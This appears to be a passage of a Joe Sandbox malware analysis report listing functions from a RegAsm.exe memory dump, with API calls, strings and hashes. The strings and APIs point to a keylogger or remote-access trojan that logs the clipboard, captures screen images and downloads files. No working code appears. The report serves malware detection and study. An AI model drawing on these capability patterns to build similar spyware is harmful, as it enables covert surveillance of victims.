                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1635606685-2084328917
                                                                                                                                                                                                  • Opcode ID: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                                                                                                  Function 00442559 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004425A0
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00442620
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1834446548-2084328917
                                                                                                                                                                                                  • Opcode ID: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                                                                                                                                                                                  • Instruction ID: 27c6b2887722bd8dd8fc110c7074932bdcd8c9000dde826a4c26c38167b381c7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6341E831A00158ABEB20DF14CE80BE977B5EB48304F5585EAF54997241EBB9DDC2CF98
                                                                                                                                                                                                  Function 00418ACD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                                                                                                  • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                                  • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                                                                                  Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                                  • API String ID: 1881088180-3686566968
                                                                                                                                                                                                  • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                                                                  Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                                                                  Function 0044B7B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B85B
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B884
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 442123175-2084328917
                                                                                                                                                                                                  • Opcode ID: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                                                                                                                                                                                  • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                                                                                                                                                                  Function 0044B6D2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B76D
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B796
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 442123175-2084328917
                                                                                                                                                                                                  • Opcode ID: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                                                                                                                                                                                  • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                                                                                                                                                                  Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                  • String ID: image/png
                                                                                                                                                                                                  • API String ID: 1291196975-2966254431
                                                                                                                                                                                                  • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                                  • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                                                                                  Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                  • API String ID: 481472006-1507639952
                                                                                                                                                                                                  • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                                                                                  Function 00443487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _abort
                                                                                                                                                                                                  • String ID: t'`$t'`/
                                                                                                                                                                                                  • API String ID: 1888311480-3252074118
                                                                                                                                                                                                  • Opcode ID: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                                                                                                                                                                                  • Instruction ID: 3fe02070f8d2a70cab432f83213559668c8dc8cd07ffd2e3f30c78975cd7cd62
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD113A326207049BEB14AF79EC06B4D7790AB00B20F15402BF90D9B2C2DBB89C408A8C
                                                                                                                                                                                                  Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DownloadFileSleep
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 1931167962-604454484
                                                                                                                                                                                                  • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                                                                                  Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                  • String ID: : $Se.
                                                                                                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                  Function 0043502B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043506F
                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00435156
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3761405300-2084328917
                                                                                                                                                                                                  • Opcode ID: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                                                                                                                                                                                  • Instruction ID: c499df361ad1c1a9c93393a24c16d6e92e8df025d99686d048565dfc03b89b9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED21EDB9520200DBD724DF1DE992A843BA4FB08354F10503AED0C8B7B0E3B569C08F8D
                                                                                                                                                                                                  Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                  • API String ID: 481472006-2430845779
                                                                                                                                                                                                  • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                                                                  Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: alarm.wav$hYG
                                                                                                                                                                                                  • API String ID: 1174141254-2782910960
                                                                                                                                                                                                  • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                                                                                                                                                                                  Function 0040B08C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                                                                                                                  • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                  • String ID: Online Keylogger Stopped
                                                                                                                                                                                                  • API String ID: 1623830855-1496645233
                                                                                                                                                                                                  • Opcode ID: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                                                  • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58fc78273637d3a7085363245c614971f3a5c921d027ed369f39b2d39b95462a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
